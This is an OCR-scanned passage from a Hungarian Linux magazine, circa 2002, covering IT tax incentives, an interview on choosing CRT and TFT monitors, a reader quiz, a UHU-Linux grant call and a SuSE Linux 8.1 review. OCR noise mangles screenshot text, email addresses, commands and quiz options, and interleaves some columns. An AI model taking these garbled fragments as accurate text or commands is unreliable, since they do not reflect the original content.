nak új lendületet kell adni, ezzel növelve az ország ver- 
senyképességét — mondta Kovács Kálmán informatikai 
és hírközlési miniszter a KFKI-csoport szakmai napján. 

A miniszter a program feladatairól és költségigényéről 
nem árult el részleteket, ám annyit már most tudni, hogy 
a Neumann-évre való tekintettel állították össze a jövő 
évi adószabályozás információs társadalmat érintő 
adókedvezmény-csomagját is. 

Az otthoni PC- és internethasználat elősegítésére a 
jövő évtől a munkaadók 60 ezer forintig személyijöve- 
delemadó-mentesen közvetlenül juttathatnak munkavál- 
lalóiknak számítógépes eszközöket, amelyek gyorsított 
amortizációval 5 helyett 3 év alatt dolgozóik tulajdo- 
nába kerülhetnek. 

A másfél éve megtorpant széles sávú hálózatok fej- 
lesztését az állam úgy segíti, hogy 2003-tól a beruházó 
cégek társasági adójukból a beruházás értékének felét 
leírhatják. A miniszter jelezte, hogy az adókedvezmény- 
csomag harmadik része szerint az internethasználat 
fellendítése érdekében a társas vállalkozásokon kívül 
az egyéni vállalkozók és az őstermelők is elszámol- 
hatják a Világhálóhoz való hozzáférés költségét. 
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Ingyenes IBIM DB2-oktatások 

A Budapesti Gazdasági Főiskolán három IBM DB2 té- 
májú tanfolyamon vehetnek részt ingyenesen az érdek- 
lődők. Külön kurzuson várják azokat a rendszergazdá- 
kat, programozókat, akik eddig más relációs adatbázis- 
kezelővel dolgoztak, akik egy évnél kevesebb gyakorlat- 
tal rendelkeznek más adatbázis használatában, illetve 
azokat, akik a 8.1-es változat újdonságait szeretnék 
megismerni. Létszámtól függően az oktatást az érdek- 
lődő cég telephelyén is megtartják, vidékiek esetében 
csupán a szállást kell biztosítani. 

2 http:/Awww.baf.hu 


Medgyesi Zoltán (mzerettesoft.hu) 

a BMGE 24 éves informatika szakos hallgatója. 
Szabadidejét legszívesebben a barátnőjével tölti. 
Szeret autózni és bográcsban főzni. A Linuxot hat 
éve Ismeri, de még nem volt lelkiereje, hogy 
áttérjen rá. A Linuxvilág magazin hírszerkesztője. 
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Profi, grafikai 
munkákhoz 
továbbra is a 
nagyméretű CRT 
monitorokat 
ajánljuk. 





Linuxvilág 


Látod? Nem látod? Na látod! 


Milyen megjelenítők közül válogathatunk manapság? 


Pár hete történt velem, hogy az egyik gépemhez egy 
lapmonitort szerettem volna vásárolni. Mit tesz ilyenkor 
a tapasztalatlan informatikus? Besétál egy boltba, ahol 
elég sok monitort lát, és érdeklődik, melyik volna számá- 
ra a legjobb vétel. Így is tettem, de egy pár pillanat után 
kiderült, hogy az eladó sem tudta pontosan elmondani, 
melyik megjelenítő miért jobb vagy rosszabb a másiknál. 
így született az ötlet, hogy írjunk egy cikket a monitorok 
típusairól, illetve az összehasonlításuk módjáról. 





Első körben foglalkozzunk egy kicsit az ősidőkkel! A leg- 
első monitorokkal már legfeljebb múzeumokban (és álla- 
mi vállalatoknál) találkozhatunk, az egyszínű (többnyire 
zöld vagy ámbra) dobozokkal, amelyek általában Hercu- 
les kártyával működtek; a CGA, EGA, MGA monitorokkal 
és vezérlőkkel, amelyek vagy színmélységben, vagy tu- 
dásban maradtak el későbbi testvérüktől, a VGA-tól. 
Ezek a monitorok mind a CRT családba tartoztak, megje- 
lenítési módszerük a tévééhez hasonlatos: képcső, elekt- 
ronágyú. A CRT monitorok alatt tehát az , általános" 
monitorokat értjük. 

A megjelenítők világa egy külön szakma. Ezért is kértem 
segítséget az egyik jó nevű monitorgyár, az LG magyar- 
országi képviseletének szakemberétől, Bálint András-tól. 


$Szy György: Elsősorban milyen tulajdonságokra 

ügyeljünk egy CRT kiválasztásakor? 

Bálint András: Sok szempontot figyelembe vehetünk, 

szedjük sorba a legfontosabbakat: 

e — Video-sávszélesség: ez határozza meg, hogy mennyi 
jelet képes fogadni egyszerre. Ezzel a tulajdonsággal 
közvetlenül nem találkozunk, de következtethetünk 
rá, például abból, hogy az 1024 x 768-as (vagy na- 
gyobb) felbontást mely legnagyobb frissítési gyako- 
risággal tudja megjeleníteni (ez úgy számítható ki 
egyszerűen, ha az adott felbontásnál nem valamelyik 
egyéb szűk keresztmetszet a meghatározó). 

e — Sor- és képfrissítési gyakoriság, amit KHz-ben, 
illetve H2-ben adnak meg. Természetesen minél 
nagyobb, annál jobb. 


e A támogatott üzemmódok, illetve felbontások, 
vagyis hogy a teljes képet hány külön képpontként 
kezeli függőlegesen, illetve vízszintesen. A mai 
monitorok mellett az 1024 x 768-as üzemmód vehető 
az alapnak. 

e — A megjelenítő felület mérete. Ezt általában hüvelyk- 
ben (collban) adják meg: 14", 15" stb. 

e — A képpontméret: minél kisebb, annál élesebb képet 
várhatunk. A résmaszkot foszforrétegként és az ágyú 
között lévő lemezként képzelhetjük el, amelyeken kis, 
téglalap alakú nyílások vannak. Ezeken a nyílásokon 
kell az ágyúnak átlőnie az elektronokat. A régi moni- 
toroknál lyukmaszk volt, a nyílások kör vagy ovális 
alakúak voltak — a rések élesebb képet biztosítanak. 

e — Képélesség, képtorzítás és egyéb ,nem számszerű- 
síthető" tulajdonságok. 


Vásárlás közben az alábbiak szem előtt tartását 

javaslom: 

e — Ahogyan két-három éve a 14"-os, manapság a 
15"-os monitorokat tekinthetjük , kifutó típusnak", 
vagyis ha megtehetjük, 17" alatti méretben ne is 
gondolkozzunk. 

e . A monitor bizonyos tulajdonságai már a dobozról 
kiderülnek. Ami nagyon fontos a CRT-knél, az az, 
hogy milyen felbontás-képfrissítés párost kezelnek. 
A felbontást a felhasználás szabja meg, ez rendes 
munkához legalább 1024 x 768-as legyen, nagyobb 
monitorok esetén természetesen nagyobb. 

e A szem számára a 75 Hz-es frissítés a határ, tehát 
a használni kívánt felbontást leendő monitorunk 
legalább 85 Hz-en kezelje (itt is elmondható, hogy 
minél többet tud, annál jobb). 

e — Egyszer szánjunk rá időt, és sétáljunk végig egy 
olyan áruházban, ahol legalább tizenöt-húsz külön- 
böző típusú CRT-t látunk egymás mellett, és figyel- 
jük meg a képek torzítását (lásd később). Manapság 
többféle eljárással is készítenek ilyen monitorokat, 
most elsősorban azt nézzük meg, hogy a függőleges 
és a vízszintes csíkok a képernyő szélén és közepén 
párhuzamosak-e. A gyengébb minőségű monitorok- 
nál a ,párnahatást" tapasztalhatjuk: a sarkok felé 
a vonalak elhajlanak. 

e . Több monitor rendelkezik már környezetbarát minő- 
sítéssel. Ne vegyünk olyan monitort, amelyik lega- 
lább az MPR II-es minősítéssel nem rendelkezik, de 
ha tudunk, válasszunk TCO "95-ösnek vagy TCO 
"99-esnek megfelelő monitort (ebben a sorrendben 
egyre szigorúbb szabványokról van szó). 

e — Egyéb tulajdonságok: hány év garanciát kapunk 
a termékkel? Milyen különleges képessége, további 
szolgáltatása van? 


$Szy György: A monitorgyárak folyamatosan fejlesztik 

a gyártási folyamatot. Manapság milyen fő kategóriákba 
sorolhatók a képcsövek? Hogyan befolyásolja ez a 
képtorzítást? 





. Láttuk-hallottuk — I 


jú a 


Bálint András: Legelőször a tévékéhez hasonló mód- 
szerrel készültek a monitorok, és a felületük erősen 
domború volt — azokban az időkben csak így tudták 
elérhető áron megoldani, hogy a kép egész területe éles 
legyen. Cserébe viszont a képernyő szélén már erős 
torzulás lépett fel. Idővel minden gyár igyekezett , síkká" 
varázsolni a képernyőt, a felület egyre laposabb lett, 
majd megszülettek a más módszerrel készített sík kép- 
csöves monitorok. 

Az LG már több éve az általa kifejlesztett és 1998-ban 
piacra dobott úgynevezett Flatron előállítási módszert 
alkalmazza, aminek nagy előnye, hogy a felület nemcsak 
a megjelenítési réteg egy szintjén sík, hanem mind a 
hármon, tehát a résmaszk, a foszforréteg és a külső 
üvegréteg is sík. A gyártási eljárás kialakításánál szemé- 
szek segítségét is kértük, így figyelembe tudtuk venni az 
emberi szem tulajdonságait is. 

Szy György: Sokat hallani félhivatalos forrásokból a CRT 
monitorok sugárzásáról. Hallani olyan pletykákat is, hogy 
nemcsak előre sugároznak, károsítva ezzel a felhaszná- 
lót, de hátrafelé is, ráadásul sokkal erősebben. Mennyi 
igaz ezekből a történetekből? 

Bálint András: Igen, a monitor hátuljában valóban van 
egy elektronágyú, ami folyamatosan dolgozik, de szeren- 
csére ma már olyan fejlett megoldások léteznek, ame- 
lyek alkalmazásával a sugárzást a jobb minőségű moni- 
toroknál rendkívül alacsony szintre vissza lehet szorítani. 
Az LG felfogását ebben a kérdésben is jól tükrözi, hogy 
monitorjaink felületét egy hatrétegű védőbevonattal 
látjuk el, ami többek között az ilyen típusú sugárzásokat 
is nagymértékben csökkenti. Emellett azoknak, akiknek 
a szeme érzékenyebb az ilyen típusú sugárzásra, a TFT 
monitorokat ajánljuk — ezeknél nincs elektronágyú, a 
sugárzásuk szinte elhanyagolható. 

$Szy György: Manapság egyre többet beszélnek az LCD, 
TFT, TFT-LCD és hasonló kódokkal ellátott lapmonito- 
rokról. Milyen fajtákkal találkozhatunk, mennyiben tud- 
nak ezek többet vagy kevesebbet? 

Bálint András: Az LCD egy más fejlesztési vonal: 
folyadékkristályos megoldás, ugyanabba a családba 
tartozik, mint például a digitális órák vagy a telefonok 
megjelenítői. A monitorok világában a TFT-változat 
terjedt el, innen a félreértés a rövidítések között — való- 
jában ez a három ugyanazt a családot jelöli. Megjele- 
nése óta ez a típus is sokat fejlődött, ma a lapmonitorok- 
nál már alapkövetelmény a széles látószög, valamint a 
jól látható színek. A TFT-LCD monitorok előnyei a hagyo- 
mányos CRT monitorokkal szemben, hogy sem villódzás, 
sem sugárzás nem lép fel, mivel a folyadékkristályos 
megoldás révén digitális képük van, másrészt pedig 

a háttérvilágítást hidegkatódos fluoreszcens lámpák 
biztosítják. Az LCD kijelzőket ezért is javasoljuk fizikai 
felbontásukkal megegyező üzemmódban használni, 

a legjobb képminőség érdekében. 

A TFT-monitorok emellett sok egyéb jó tulajdonsággal 
rendelkeznek, a legfontosabb a méret, valamint érdekes 
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még megemlíteni, hogy egy kicsit a frissítési gyakoriság 
értelmezése is módosul. A lapmonitoroknál ugyanis nincs 
szükség nagyon magas értékeket beállítani, 75 Hz-es 
frissítés mellett is gyönyörű 
képet kapunk. 

Profi felhasználáshoz, grafikai 
munkákhoz ezek ellenére 
továbbra is a nagyméretű 
CRT monitorokat ajánljuk. 
Szy György: Pár hete történt 
velem, hogy egy Toshiba 
laptopot vásároltam, az ere- 
deti csomagolásban vittem 
haza a boltból, és sajnos 
nem bontottam ki azonnal. 
Kinyitás után derült ki, hogy 
a laptop megjelenítője kép- 
ponthibás, azaz a képernyő 
közepén ott virít egy fehér 
pont. A boltban azt mondták, hogy lapmonitoroknál nyolc 
képpont alattra nem vonatkozik a garancia, szokjak 
hozzá. A vásárló szemszögéből ez hihetetlenül bosszan- 


Ha tehát az ember 
vesz egy drága 


tó, kiad félmillió forintot egy új gépért, és amikor kiderül, TFT monitort, 
hogy hibás, nem cserélik ki. Onök is gyártanak laptopot, felkészülhet 
van-e Onöknél ilyen típusú hiba? ű 8 

rá, hogy képpont- 


Bálint András: Az LG-nél, mint a többi TFT-gyártónál is 
szabályozott, hogy mit tekinthetünk hibásnak. A garan- 
cia csak meghatározott számú képponthiba felett érvé- 
nyes. Ugyanakkor ha a hibás képpontok elszórva helyez- 
kednek el a megjelenítőn, akkor is csak bizonyos sűrű- 
ség fölött cserélünk. Például azonnal kicseréljük, ha 
három hibás képpont található egymás mellett. 

$Szy György: Ha tehát az ember vesz egy drága TFT 
monitort, felkészülhet rá, hogy hibás készüléket kap, 
amit nem Is cserélnek ki? 

Bálint András: A mai gyártási lehetőségek mellett igen. 
Ha a gyár nem engedné meg ezt a szórást, akkor TFT 
monitorok nem lennének elérhető árfekvésben. 

$Szy György: Akkor hogyan lehetek biztos benne, hogy 
nem hibás monitort vásárolok? Az egyetlen megoldás 
tehát az marad, hogy a vásárlás helyén kipróbálom a 
szerkezetet, és ha képponthibás a megjelenítő, akkor 
nem veszem át? 

Bálint András: Amennyiben az említett leírás alapján 
hibásnak tekinthető a monitor, a vásárlás után is 
érvényes a garancia, de ha lehetőség van rá, minden- 
képpen javaslom, hogy a vásárlók ezen szempontokat is 
vegyék figyelembe a vásárlást megelőző kipróbálásnál. 
$Szy György: Köszönöm a beszélgetést. 


Szy György 

a Linuxvilág főszerkesztője, 

a Kiskapu Kiadó vezetője. Mindenki 
véleményét és levelét örömmel 
várja az alábbi levélcímen: 
Szy.GyorgyAlinuxvilag.hu 
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hibás készüléket 
kap, amit nem is 
cserélnek ki? 
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1. Hány éves a Linuxvilág? 
Hi 2 
. E 
Hi 10 
2. Szerepelt-e már pingvin a magazin borítóján? 


ő Igen (Ha igen, hányszor?) 


E Nem 


3. Hányszor szerepelt az Apache szó a magazin 
eddigi számaiban? 


! ]245 
! 115000 
[ ) Sokszor 


4. Hány szám jelent meg eddig, és mennyi a 
mellékelt CD-k száma összesen? 


E 21 szám, 44 CD 
[ ) 16 szám, 32 CD 
! ]20 szám, 60 CD 
5. Tudsz-e magyar fejlesztésű Linuxról? 


FA Igen (Ha Igen, nevezd meg!) 


ÉG Nem 


6. Beszél-e magyarul az OpenOffice.org 
és a Mozilla? 


(Igen 


MEA Igen, de csak az OpenOffice.org 
.. ] Nem, a Mozilla sem 


7. Kinek a nevéhez fűződik a Linux-rendszermag 
fejlesztése? 


Bi Bill Gates 


!. ]) John ,maddog" Hall 
. ]) Linus Torvalds 


8. Mit csinlakil1 -9 3987 parancs? 


9. Mit csinál az rm /bin/1laden parancs? 


10. Mi az RPM? 
jő Röptében Postázó Megoldás 


[ ) Radical Preferences Manager 
Hü Red Hat Package Manager 


11. Mikor jelent meg a Woody? 


Év: hónap: nap: 


12. Használhatjuk-e a Tintahalat kedvenc 
indiántörzsünk kapcsolatának gyorsítására? 


( ] Igen 
, ]) Nem 
. ) Tessék? 


13. Igaz-e, hogy az Egyesült Államok kormánya 
fejleszti a United Linuxot? 


13-71. MI a Samba? 
!  ) Dél-amerikai tánc 
[ ) Kiszolgálócsomag 
! ) Kitűnő csokoládé 


A Linux-totó beküldési határideje: 2002. november 30. 


Az ajándéksorsolás időpontja: december 5. 


A helyes megfejtést beküldők között 1 db 5000 forintos könyvutalványt, 20 db 
Linuxvilág-pólót, 5 db bögrét és 10 db Linuxvilág-posztert sorsolunk Ki. 


A nyerteseket levélben, illetve e-mailban értesítjük, továbbá nevük és nyereményük 
listáját a januári számunkban valamint a 3 http://www.linuxvilag.hu oldalon is közöljük. 
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Eljött az ideje! 


Az UHU-Linux Kft. 2002 októberében meghirdetett 
pályázata az , UHU-Linux továbbfejlesztésének és 
népszerűsítésének támogatása" témában talán fel- 
rázza végre , csipkerózsika-álmából" a hazai linuxos 
közösséget. 


Van, aki beszél róla, néhányan rögtön nekifognak, többen 
évekig tartogatják, és akad olyan is, aki soha nem fogja 
megvalósítani. Sokaknak van egy régóta dédelgetett 
ötlete, ezért az UHU-Linux készítői úgy döntöttek, hogy 
pályázat formájában összegyűjtik a már megvalósult és 
megvalósulás előtt álló gondolatokat, majd a legjobbak- 
nak esélyt adnak a fennmaradásra, a továbbfejlődésre. 


A támogatás célja 

A szabad programok fejlesztése általában nonprofit jelleg- 
gel működik: az egyéni alkotóerő összeadódásából, lelke- 
sedésből. Ahhoz, hogy a hatékonyságot ugrásszerűen 
megnövelhessük, összpontosítanunk kell az erőforrásokat. 
Az UHU-Linux Kft. az általa összefogott fejlesztés ezmel- 
lett figyelmet fordít a fentiekben megfogalmazott célok- 
kal nem szükségszerűen egybeeső, ugyanakkor a fejlesz- 
tői, illetve alkalmazási szempontokat figyelembe vevő, 
társadalmilag hasznos fejlesztések támogatására is. 

A társaság közvetlenül összehangolt saját fejlesztőcsa- 
pata mellett támogatást kíván nyújtani az olyan, nem a 
céghez tartozó fejlesztői csoportok számára is, amelyek 
a magyarországi egyéni Linux-használat elterjedése 
érdekében, vagy éppen egy más nagyságrendű felhasz- 
nálói hozzáférést elősegítő fejlesztésen dolgoznak. 


A pályázók köre 
A pályázaton minden természetes és jogi személy 
részt vehet. 


A pályázati feltételek 
A pályázaton nyertes programot a támogatási szerződés 
aláírását követő fél éven belül meg kell valósítani. 


A pályázattal elnyerhető támogatás 

A támogatás formája: vissza nem térítendő. Az elnyert 
támogatást ösztöndíj, készpénz vagy egyéb IT-eszközök 
formájában nyújtja a társaság. 


A pályázat benyújtásának módja 

A pályázatot magyar nyelven, kizárólag a pályázati útmu- 
tatóban közölteknek megfelelően kitöltött adatlapon és az 
egyéb előírt dokumentumok csatolásával lehet benyújtani. 
Az adatlap sem tartalmában, sem alakjában nem változ- 

tatható meg. A pályázati adatlap és az útmutató az UHU- 
Linux Kft. honlapjáról (5 http:/Avwvwwv.uhulinux.hu/) tölthető 
le. A bírálóbizottság tagjai hazai elismert szakemberek. 


Témajavaslatok 

Az UHU-Linux Kft. az alább felsorolt témajavaslatokkal 
kívánja segíteni a pályázókat a pályázati programterv 
kialakításában. A kutatási, programozási témák felso- 
rolása nem kimerítő jellegű, bármilyen UHU-Linux 
terjesztés továbbfejlesztésének, népszerűsítésének 
témakörébe tartozó pályázat támogatást nyerhet. 
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Alkalmazásfejlesztés 

e  Oktatást segítő alkalmazások készítése. 
Megjegyzés: általános és középiskolai tantárgyakhoz 
várnak programokat. 

e — Vállalkozásokat segítő alkalmazások készítése. 
Megjegyzés: üzletmenetet segítő alkalmazásokra 
kell gondolni, beleértve az irodai, a hálózati progra- 
mokat, de ide tartoznak a célgépekre írt meghaj- 
tóprogramok Is. 

e . Már meglévő alkalmazások továbbfejlesztése 
Megjegyzés: ez gyakorlatilag bármilyen program 
lehet, de működnie kell UHU-Linux alatt. 

e — Játékprogramok fejlesztése. 

Megjegyzés: bármilyen típusú játék szóba jöhet, 
de a gyerekeknek szólók 
előnyt élveznek. 


Tanulmányok 

e — Beágyazott rendszerek. 
e Lakásautomatizálás Linux segítségével. 
e — A lLinux oktatása állami iskolákban. 

e — A Linux közgazdasági vonatkozásai. 

e — Egyéb (bármi, ami hasznos lehet). 





Grafikával kapcsolatos munkák 

e — Egységesített UHU-témák. 
Megjegyzés: ikonok, testreszabás, XMMS-, MPlayer- 
ből, kisgyermekek számára élvezhető témák. 

e . Magyar betűkészletek készítése (legalább ötféle). 


Oktatással kapcsolatos témák 

e — Elektronikus tananyagok 
Megjegyzés: itt nemcsak az UHU-Linux oktatására 
gondolnak, hanem programozói nyelvek, bonyolult 
alkalmazások megtanulását segítő tananyagok 
készítésére is. Fontos, hogy olyan anyagokat várnak, 
amelyekből a tudást önképzéssel meg lehet szerezni. 

e . UHU-Linux oktatása multimédiás eszközökkel 
Megjegyzés: tanárok, általános és középiskolás 
tanulók számára. 


Dokumentálással, magyarítással kapcsolatos témák 

e — Egységesített leírások, fordítások készítése 
Megjegyzés: bármilyen témáról elfogadunk anyagot, 
ami az UHU-Linux terjesztéshez kapcsolható. 


A tervezetben olvasható témák olvastán érezhető, 

hogy nem csak programozók részvételére számítanak. 
Javasolják, hogy egy-egy ötletet fejlesztői csoportok 
dolgozzanak fel, mert így lényegesen hatékonyabban 
lehet elvégezni a munkát. Bármilyen támogatást, bírála- 
tot szívesen fogadnak a palyazatouhulinux.hu címen! 


Gibizer Tibor 
(gibzo(olinuxmania.hu) 

újságíró, immár hét éve a Linux 
elkötelezett híve. Imádja a kutyákat, 
a kerékpározást és az autós 
csavargást. 
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SuSE Linux 8.1 


A német kiadás október 7—8-ra készült el, a magyar 
kiadás pedig október vége felé vásárolható meg. 


Vámosi Tamás, a SuSE Linux magyarországi irodájának 
munkatársa rendelkezésünkre bocsátotta a SuSE Linux 


Üdvözli a vasT2 —— a SuSE Linux 
telepítő és rendszerkarbantartó programja. 


válasszon nyelvet: 


Telepítési 
beállítások 


Portugués brasileiro 
HI (Chinese) 
Sslovencina 
Sinvensfina 


A telepítés 
megkezdése 


Csaj 


Figyelmeztetés: 

A YvaST2 minden, a SuSE Linux telepítéséhez szükséges adattal rendelkezik. 
A telepítés a korábbi párbeszédablakokban megadott beállítások szerint 
történik. A telepítés végrehajtásához nyomja meg az "igen" gombot. 
valaszoljon "Nem"—mel, hogy visszatérjen az 

előző párbeszédablakhoz. 


Kezdüdhet a telepílés? 


gen — telepítes !H 


Szűrő: 


 — Jösszeállítások 


SETS EL E — TEN TOTETT ) 


pal freetype2 

bi ; ; pl ghostscript-fonts-std  7.05.3-46 
Mi KDE grafikus munkakört ! (hsá glib 1.2.10-310 
L] Minden, ami KDE pal glibc—locale 2.2.5-154 
L] Gnome rendszer 1.2.10-440 
Mi Segítség És terméktámt 1.3.2-236 
Mi Irodai alkalmazások 0.1-403 
L] Játékok 1.2-410 
L] Multimédia 1.9.10-478 
[1 Egyszerű webszerver 0.9.5-613 
LÓ] LDAP szerver És segéd 1.2-410 
L] HálózatSzerver 6.2.0—468 
[L] C/C4- fordító és segéde 

LL] Bővített fejlesztési eszk 

[1 TclFTk fejlestői rendsze 


Függvénytár a Trud 
Szabvány betük Gh 
segédfunkciók függ 
Nyelvi adatok a loká 
Gimp Toolkit progra 
Egy grafikus átalal 
Hardver ellenőrző 8 
Európai betükészle 
Megosztott függvé 
Az IntelliMouse (És 
Dokumentációk a Naj 
JPEG függyvén tára 


freetype -— TrueType betűkészlet motor 


Könyvtár a TrueType betütípusokkal végzett munkához. A 
dokumentáció /usrisharesdocipackagesőfreetype alatt 
található. 





He Bsz: Szakértői X11 beállítás 
ér éti Munkaasztal 





Üdvözli a SuSE X11 beállító asszisztense 
XFree86 Version 4.2.0 7 X Window System 


t S Többmonitoros 


§- Cs Beviteli eszközök 


eliőía? AccessX 





Az indításhoz kattintson a komponensek listája egyik ikonjára. 24 


Beálltásak mádaesítása 








8.1 RC4-es próba- 
változatát, ami ennek a 
leírásnak az alapjául 
szolgált. 

A SuSE Linux 8-as 
sorozata komoly válto- 
zást hozott mind a 
kinézetét, mind a belső 
felépítését tekintve. 

A zöld szín eluralko- 
dását a SuSEconfig 
fájlok megjelenése 
követte. Ekkoriban sok 
bírálat érte a készítő- 
ket. Többen, főleg a 
régi felhasználók közül 
tiltakoztak a jó öreg 
karakteres YaST prog- 
ram használhatatlan- 
sága miatt, sérelmez- 
ték, hogy a grafikus 
YaS12 adta lehetősé- 
gek tárháza meglehe- 
tősen szűk, és sebes- 
sége miatt használati 
értéke csekély. A KDE3 
grafikus felület talán 
túl korán lett a rend- 
szerbe vonva, Így a 
ma már legendásnak 
számító SuSE-KDE 
szoros együttműködé- 
se ellenére is több 
apró, de bosszantó 
hibával találkozhatott 
a felhasználó. Vitatha- 
tatlan előnyei ellenére 
sokan ma is keserű 
szájízzel gondolnak 

a SuSE 8.0-ra. 

A SuSE-terjesztés 
készítői nem nézhették 
tétlenül, hogy a fel- 
használók elégedet- 
lenkednek, így ere- 
jüket és tudásukat 
latba vetve megal- 
kották a SuSE 8.1-et. 
Ezzel a SuSE belépett 


a ,kék korszakába", ugyanis az uralkodó szín immáron 
a kék. A külső megjelenésben történt változások 
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szembeötlőek. A KDE3 tökéletesen alkalmazkodik a 
kék korszakhoz". Az ikonok, az ablakok fejléce és 
általában a megjelenés kellemes — jól átgondolt terve- 
zés eredménye. A 8.1 legfőbb újdonságai a YaST-ban 
rejlenek. Az egyik legnagyobb változás a felhasználói 
profilok kezelésének, szerkesztésének megjelenése, 
ami főleg a mobil számítógépet használók számára lehet 
hasznos, illetve azoknak a felhasználóknak, akik az asz- 
tali számítóképeket is több alkatrészkiépítéssel (hard- 
ware profile) szeretnék használni. A YaST2 grafikus 
rendszeren keresztül nagyon könnyen beállítható. Egy 
teljes biztonsági mentést készítő modullal bővült, amivel 
az esetlegesen megsérült rendszert természetesen 
vissza is tudjuk állítani. 

Javítottak a logikaikötet-kezelő modulon, kicserélődött 
és teljesen a YaST2-be beépült a SaX2, amivel a grafikus 
beállításokat finomíthatjuk. Ezzel a megoldással a grafi- 
kus környezet és a munkaasztal , mélyebben" testre- 
szabható. Többképernyős módot is be tudunk állítani, 
például az Ati vagy Matrox kártyák esetében, ahol ez 
engedélyezett. A képernyők elrendezését is itt tudjuk 
beállítani, illetve még lényeges lehet, hogy az érintő- 
képernyő kezelése is támogatott. 

Bővült a monitor-adatbázis, és a szerkezete is megújult. 
A monitorok hetven százalékát dvc kód alapján felis- 
meri. CUPS-ra változott az alapértelmezett nyomtató- 
rendszer. A CUPS nyomtatórendszer nyomtató adat- 
bázisa nagyon nagy, szinte minden nyomtatót kezel 

— a linuxos-unixos világban gyakorlatilag szabványnak 
számít. Szintén érdeklődésre tarthat számot a csomag- 
kezelés: a csomagtelepítő és -eltávolító modulban 
újracsoportosították az RPM-csomagokat, tehát több 
különböző csoportban találhatók meg. Egyúttal sokkal 
áttekinthetőbb lett, és a csomagok keresését is újabb 
szolgáltatással bővítették. A csomagadatok minden 
csomag esetében magyarul jelennek meg, illetve min- 
den egyes csomagról a csomagkezelő ablak alsó részé- 
ben bő leírást találhatunk. Ebben az alkatrészek adatai- 
ról és a függőségekről olvashatunk. Természetesen 

a YaST fejlesztése nem állt le, ennek köszönhetően is 
gyorsult a program, ami már a YaST indításakor is jól 
megfigyelhető. Fontos kényelmi szolgáltatás, hogy az 
eddigi terjesztésekkel ellentétben a YaST már nem kéri 
minden induláskor az első CD-t. Bővültek a telepítési 
helyek: már lehet HTTP-n keresztül telepíteni, az £tp 
modul telepítési lehetőségét egy kicsit módosították 
és kibővítették. 

Nagyon fontos, hogy a csomagok egyenkénti telepítése 
is megoldott, a SuSE a csomagtelepítőt a Konguerorba 
vonta be. Ez azt jelenti, hogy ha valaki grafikus felületet 
és a Konguerort használja, egy RPM-csomagra rákattint- 
va a csomagkezelő elindul, és máris telepíthetünk. 

A 8.0-t rengeteg bírálat érte a karakteres YaST miatt, 
hogy használhatatlan, rossz, illetve sokan hiányolták a 
YaST1-et. Ebben az esetben a karakteres YaS12 teljesen 
át lett dolgozva, immár rendkívül gyors és jól vezérel- 
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hető. Ugyanazok a szolgáltatások érhetők el, mint ame- 

lyek a grafikus változatban is megtalálhatók. Ezt a rend- 
szergazdák igen jól tudják majd használni, és természe- 

tesen magyarul beszél. Törekedtek arra is, hogy a hono- 
sítás minél magasabb színvonalú legyen. 


Fájl Segítség 


Jelenleg beállított képernyők 


640X430€175HZ 
640X4S0ASSHZ 
T20X400€185HZ 
300X600€A56HZ 
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A kezelése lényegesen kellemesebb, mivel nem a tabulá- 
torral kell lépkedni, hanem a nyílbillentyűkkel. A kezelése 
lényegében erősen emlékeztet a régi DOS-os Norton 
Commander, vagy a linuxos körökben sokkal inkább is- 
mert mc (Midnight Commander) kezelésére. Az önmű- 
ködő függőségkezelést ki-be lehet kapcsolni. 

A rendszerindításkor, illetve a telepítéskor a régi Li 1o-t 
a grub váltotta fel. Ez egy kicsit rugalmasabb, mint a 
lilo, és jobban testreszabható. 

A médiaprogramok lejátszására megjelent az MPlayer. 
Felhasználási szerződési okok miatt a win32-es kiegészí- 
téseket nem tartalmazza, de ezek a SuSE FTP-ről letölt- 
hetők lesznek. Tartalmazza az USB 2.0-s támogatást, 
valamint a Konexan lapkakészletű winmodemek kezelését. 


A SuSE 8.1 telepítése 

1. A CD-ről történő indítást követően a , Welcome to 
SuSE Linux!" felirat köszönt minket. A karakteres 
bejelentkező képernyőn dönthetünk, hogy milyen 
telepítési módot kívánunk választani. Eszményi eset- 
ben csak egy ENTER-t kell nyomnunk. 

2. Bejelentkezik a YaST2, a SuSE-Linux telepítő- és rend- 
szer-karbantartó programja, amiben a kívánt nyelvet 
lehet használni, jelen esetben a Magyar-t kell kiválasz- 
tanunk. Ennek hatására a YaS12 üzenetei azonnal 
átváltanak magyarra. 

3. Megkezdődnek a telepítési beállítások: többek között 
a merevlemez-vezérlő modulok rendszermagba töltése 
zajlik, majd a csomagválaszték kiértékelése követ- 
kezik. Itt lehetőségünk van a SuSE-t egyénre, illetve 
gépre szabni. Választhatunk a telepítési módok között, 
valamint beállíthatjuk a billentyűzetet, az egerünket, 
lemezrészeket alakíthatunk ki, ez utóbbit akár szakértő 
módban is. Természetesen a csomagok kiválasztásá- 
ra, módosítására is lehetőségünk nyílik. Amennyiben 
a telepítési beállításokat elfogadjuk, egy eredeti, 
nagyon zöld figyelmeztető ablakkal találjuk szemben 
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magunkat, ahol az igen gombra kattintva kezdetét 
veszi a korábbi beállítások szerinti telepítés. 

4. Megkezdődik a merevlemez előkészítése, a lemezré- 
szekre bontás és a formázás. A 8.0-ban már megszo- 
kott felületen kísérhetjük figyelemmel, hogy éppen 


ATA 


SuSE Linux 8.1 (linux) 


Bejelentkezési név 
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Jelszó: 


Munkakörnyezet kde . 
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hol, melyik csomag telepítésénél tartunk. Természete- 
sen a kapott üzenetek mind magyarul olvashatók. Ez 
a kávészünet ideje. Az alaptelepítés befejeződése után 
következik a beállítások frissítése, a programoknak a 
telepített rendszerre történő másolása, a rendszerbe- 
töltő telepítése, majd az első indítás előkészítése. 

. A soronlévő lépésben pár perc erejéig visszatérünk 
a karakteres képernyőre, amíg a telepített rendszer 
elindul. Ezt követően a csomagadatok olvasása követ- 
kezik, majd folytatódik az általunk kiválasztott csoma- 
gok telepítése, tehát behelyezhetjük a második és 
harmadik lemezt. 

. Meg kell adnunk a rendszergazda jelszavát, majd létre 
kell hoznunk egy új felhasználót. A telepítés ezzel még 
korántsem ért véget, mivel be kell állítanunk a grafi- 
kus munkakörnyezetet — ezt a SaX2 segítségével 
viszonylag könnyen megtehetjük. A program kezelése 
annyira kézenfekvő, hogy a részletekre nem is térek 
ki. Miután mindent sikeresen beállítottunk, beállítá- 
saink mentésre kerülnek. 

. Amennyiben a karakteres felület ismét visszaköszön, 
nyugodtan hátradőólhetünk. Ez azt jelenti, hogy a 
telepített rendszer éppen indul, és ha a grafikus kör- 
nyezetet sikeresen beállítottuk, megjelenik a KDE3 
beléptető rendszere, ahol a bejelentkezési név és a 
